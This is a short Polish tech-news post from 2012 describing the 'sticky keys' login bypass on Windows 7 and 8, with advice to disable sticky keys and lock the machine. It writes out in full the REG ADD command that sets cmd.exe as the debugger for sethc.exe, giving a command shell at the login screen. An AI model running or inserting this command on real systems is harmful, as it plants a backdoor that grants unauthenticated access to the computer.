• Błąd w systemie Windows 7 i 8 pozwala na uruchomienie dowolnego programu bez logowania

    Opublikowane 12 grudnia 2012 w dziale Bezpieczeństwo, Komputery, Systemy.

    Problem jest znany już od pewnego czasu, ale Microsoft nic nie zrobił, aby się go pozbyć.

    Włamywaczowi potrzebny jest fizyczny dostęp do komputera, na którym wpisze w linii poleceń REG ADD „HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe” /v Debugger /t REG_SZ /d „C:\windows\system32\cmd.exe” podmieniając w ten sposób akcję systemu przypisaną do 5-krotnego wciśnięcia klawisza SHIFT (klawisze trwałe).

    Od tej chwili każdy może dostęp do systemu bez konieczności logowania, tak jak na ilustracjach poniżej.

    Czy można się przed tym zabezpieczyć?

    Wystarczy wyłączyć klawisze trwałe (sticky keys) i nigdy, pod żadnym pozorem, nie oddalać się od komputera bez jego zablokowania.

     

Komentarze są wyłączone.